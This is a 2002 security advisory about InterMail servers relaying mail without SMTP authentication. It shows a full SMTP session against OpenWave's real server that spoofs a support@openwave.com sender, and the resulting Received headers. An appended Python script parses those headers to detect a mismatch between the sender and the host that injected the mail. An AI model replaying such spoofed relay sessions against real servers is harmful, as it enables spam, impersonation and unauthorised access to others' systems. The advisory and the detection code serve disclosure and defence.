Security Alert - InterMail Will Relay Email for a Valid Mailbox without SMTP Authentication

Author: Victoria Chan, Chief Security Officer
Date: August 14th 2002
After applying the patch for InterMail servers so that they no longer accept bogus mailboxes at correct domains, as exploited by the Klez virus and its work-alikes, there is still another vulnerability: InterMail servers can still be exploited to relay mail. All you need to know is a valid email address at the server's domain, and that is easily available by visiting home pages. The ramifications of this vulnerability are that InterMail users could be framed for sending out SPAM. I will not go into detail on how to set up a mail client to do that, as that would be a recipe for spammers.

OpenWave are the makers of InterMail. By simply visiting OpenWave's home page, I got valid email addresses. Doing an NSLOOKUP determined that the best MX for openwave.com is smtp1.openwave.com. You start an SMTP session with that server and use the valid email address for the MAIL FROM. The RCPT TO can be any valid email address you want to send this piece of email to via the exploited InterMail server. To demonstrate this vulnerability, I have effectively exploited OpenWave's own InterMail server - note the lack of authentication required to relay:

    Trying 206.46.164.24...
    Connected to smtp1.openwave.com.
    Escape character is '^]'.
    220 oe-ismta1.bizmailsrvcs.net ESMTP server (InterMail vM.5.01.03.15 201-253-122-118-115-20011108) ready Wed, 14 Aug 2002 18:10:36 -0500
    HELO westernstar.kendryl.net
    250 oe-ismta1.bizmailsrvcs.net
    MAIL FROM: support@openwave.com
    250 Sender <support@openwave.com> Ok
    RCPT TO: abuse@kendryl.net
    250 Recipient <abuse@kendryl.net> Ok
    DATA
    354 Ok Send data ending with <CRLF>.<CRLF>
    Subject: InterMail Relay without SMTP Authentication
    From: support@openwave.com
    To: abuse@kendryl.net

    InterMail Relay without SMTP Authentication
    .
    250 Message received: 20020814231108.XCMY18545.oe-ismta1.bizmailsrvcs.net@westernstar.kendryl.net
    QUIT
    221 oe-ismta1.bizmailsrvcs.net ESMTP server closing connection
    Connection closed by foreign host.
Here the vulnerability is confirmed by receipt of the relayed email. Note the last (earliest) Received header: the message entered oe-ismta1.bizmailsrvcs.net from westernstar.kendryl.net (64.114.82.252), a host with no relation to openwave.com, yet it carries the envelope sender support@openwave.com:

    Return-Path: <support@openwave.com>
    Delivered-To: abuse@kendryl.net
    Received: (qmail 42376 invoked by uid 1007); 14 Aug 2002 23:12:03 -0000
    Received: from support@openwave.com by westernstar.kendryl.net by uid 1004 by STACKFIT (Scanned4 Virus & SPAM Keywords 0.496784); 14 Aug 2002 23:12:03 -0000
    Received: from oe-mp1pub.managedmail.com (HELO oe-mp1.bizmailsrvcs.net) (206.46.164.22) by 820252.cipherkey.com with SMTP; 14 Aug 2002 23:12:03 -0000
    Received: from oe-ismta1.bizmailsrvcs.net ([206.46.164.26]) by oe-mp1.bizmailsrvcs.net (InterMail vM.5.01.03.15 201-253-122-118-115-20011108) with ESMTP id <20020814231201.UJUZ21795.oe-mp1.bizmailsrvcs.net@oe-ismta1.bizmailsrvcs.net> for <abuse@kendryl.net>; Wed, 14 Aug 2002 18:12:01 -0500
    Received: from westernstar.kendryl.net ([64.114.82.252]) by oe-ismta1.bizmailsrvcs.net (InterMail vM.5.01.03.15 201-253-122-118-115-20011108) with SMTP id <20020814231108.XCMY18545.oe-ismta1.bizmailsrvcs.net@westernstar.kendryl.net> for <abuse@kendryl.net>; Wed, 14 Aug 2002 18:11:08 -0500
    Subject: InterMail Relay without SMTP Authentication
    From: support@openwave.com
    To: abuse@kendryl.net
    Message-Id: <20020814231108.XCMY18545.oe-ismta1.bizmailsrvcs.net@westernstar.kendryl.net>
    Date: Wed, 14 Aug 2002 18:12:01 -0500

    InterMail Relay without SMTP Authentication

Disclaimer - This is only a security audit. The above examples are actual SMTP transactions intended to demonstrate this InterMail vulnerability. The information herein is not intended to be used to carry out exploits on InterMail servers.
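The received headers above are what a recipient's abuse desk has to work with when tracing a relayed message back to its injection point. The following is an added example, not part of the advisory or of any InterMail tooling: it parses the Received chain from the message quoted above (constructed here with the long InterMail id clauses trimmed), finds the hop at which the mail entered the first MTA, and flags that the injecting host is not one the envelope sender's domain would legitimately send from. The AUTHORIZED allow-list is hypothetical.

```python
import re
from email import message_from_string

# Matches the "from <host> (<helo>) ([<ip>]) by <host>" shape InterMail and
# qmail write; a hop with no network peer (local delivery) yields no ip.
HOP_RE = re.compile(
    r"from\s+(?P<host>\S+)"
    r"(?:\s+\((?:HELO\s+)?(?P<helo>[^\s)\[]+)\))?"
    r"(?:\s+\(?\[?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\]?\)?)?"
    r".*?\bby\s+(?P<by>\S+)")

def parse_hops(raw_headers):
    """Received hops oldest first (the bottom-most header is the first hop taken)."""
    msg = message_from_string(raw_headers)
    hops = [m.groupdict() for v in msg.get_all("Received", []) if (m := HOP_RE.search(v))]
    return hops[::-1]

def injection_hop(raw_headers):
    """The first hop that arrived over the network: who handed the mail to the first MTA."""
    return next((h for h in parse_hops(raw_headers) if h["ip"]), {})

def sender_origin_mismatch(raw_headers, authorized):
    """True when the envelope sender's domain does not originate mail from the
    injecting host/IP; an allow-list check of the kind SPF later standardised."""
    msg = message_from_string(raw_headers)
    domain = msg.get("Return-Path", "").strip("<> ").rpartition("@")[2].lower()
    hop = injection_hop(raw_headers)
    allowed = authorized.get(domain, set())
    return bool(hop) and hop["host"] not in allowed and hop["ip"] not in allowed

# Constructed sample: the Received chain of the relayed message quoted in the
# advisory, with the long InterMail id clauses trimmed.
RELAYED = """\
Return-Path: <support@openwave.com>
Received: (qmail 42376 invoked by uid 1007); 14 Aug 2002 23:12:03 -0000
Received: from oe-mp1pub.managedmail.com (HELO oe-mp1.bizmailsrvcs.net) (206.46.164.22) by 820252.cipherkey.com with SMTP; 14 Aug 2002 23:12:03 -0000
Received: from oe-ismta1.bizmailsrvcs.net ([206.46.164.26]) by oe-mp1.bizmailsrvcs.net (InterMail vM.5.01.03.15) with ESMTP for <abuse@kendryl.net>; Wed, 14 Aug 2002 18:12:01 -0500
Received: from westernstar.kendryl.net ([64.114.82.252]) by oe-ismta1.bizmailsrvcs.net (InterMail vM.5.01.03.15) with SMTP for <abuse@kendryl.net>; Wed, 14 Aug 2002 18:11:08 -0500
From: support@openwave.com

"""

# Hypothetical allow-list: hosts that legitimately originate openwave.com mail.
AUTHORIZED = {"openwave.com": {"smtp1.openwave.com", "206.46.164.24"}}

if __name__ == "__main__":
    hop = injection_hop(RELAYED)
    print(f"injected at {hop['by']} from {hop['host']} [{hop['ip']}]")
    print("sender/origin mismatch:", sender_origin_mismatch(RELAYED, AUTHORIZED))
```

The same check run at the relaying MTA (compare the connecting peer against the MAIL FROM domain before accepting RCPT TO for a foreign domain) is the mitigation the advisory is asking for; requiring SMTP authentication makes the decision explicit instead of inferred.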